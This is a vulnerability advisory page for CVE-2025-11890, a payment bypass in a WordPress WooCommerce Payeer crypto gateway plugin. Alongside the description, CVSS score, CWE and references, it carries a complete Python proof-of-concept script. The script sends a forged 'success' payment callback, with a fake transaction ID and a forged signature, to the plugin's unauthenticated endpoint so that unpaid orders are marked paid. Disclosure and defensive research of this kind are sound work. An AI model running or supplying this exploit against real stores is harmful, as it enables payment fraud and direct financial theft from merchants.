Security Vulnerability Report
CVE-2025-11890 CVSS 7.5 HIGH

Published: 2025-11-04 05:16:04
Last Modified: 2026-04-15 00:35:42

Description

The Crypto Payment Gateway with Payeer for WooCommerce plugin for WordPress is vulnerable to payment bypass in all versions up to, and including, 1.0.3. This is due to the plugin not properly verifying a payment's status through server-side validation via the /wc-api/bp-payeer-gateway-callback endpoint. This makes it possible for unauthenticated attackers to update unpaid order statuses to paid, resulting in a loss of revenue.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

Crypto Payment Gateway with Payeer for WooCommerce <= 1.0.3 (all versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import json

# CVE-2025-11890 PoC - Payment Bypass via Callback Endpoint
# Target: WordPress site with Crypto Payment Gateway with Payeer for WooCommerce < 1.0.4

TARGET_URL = "https://vulnerable-site.com"
ORDER_ID = "12345"  # Replace with actual order ID
CALLBACK_ENDPOINT = "/wc-api/bp-payeer-gateway-callback"


def exploit_payment_bypass():
    """
    Exploit payment bypass vulnerability by sending fake callback to update order status.
    This PoC demonstrates how attackers can mark unpaid orders as paid.
    """
    url = f"{TARGET_URL}{CALLBACK_ENDPOINT}"

    # Malicious callback payload - forging payment success response
    # Plugin does not properly validate this with Payeer server-side
    payload = {
        "order_id": ORDER_ID,
        "status": "success",
        "amount": "99.99",
        "currency": "USD",
        "transaction_id": "FAKE_TXN_" + str(ORDER_ID),
        "payment_date": "2025-01-01 00:00:00",
        "payer_account": "P123456789",
        "signature": "forged_signature_here",
    }

    headers = {
        "Content-Type": "application/json",
        "User-Agent": "Payeer Gateway Callback/1.0",
    }

    try:
        print(f"[*] Sending malicious callback to {url}")
        print(f"[*] Target Order ID: {ORDER_ID}")
        response = requests.post(url, json=payload, headers=headers, timeout=10)
        print(f"[*] Response Status: {response.status_code}")
        print(f"[*] Response Body: {response.text}")
        if response.status_code == 200:
            print("[+] Payment bypass exploit sent successfully!")
            print("[+] Order status may have been updated to 'paid' without actual payment")
        else:
            print("[-] Exploit may have failed")
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")


if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2025-11890 - Payment Bypass PoC")
    print("Crypto Payment Gateway with Payeer for WooCommerce < 1.0.4")
    print("=" * 60)
    exploit_payment_bypass()

Weakness

CWE-862 (Missing Authorization)

Vulnerability Status: Deferred

References

https://wordpress.org/plugins/crypto-payment-gateway-with-payeer-for-woocommerce/
https://www.wordfence.com/threat-intel/vulnerabilities/id/43ca1393-637d-48e2-84f3-a06a4f0d83d1?source=cve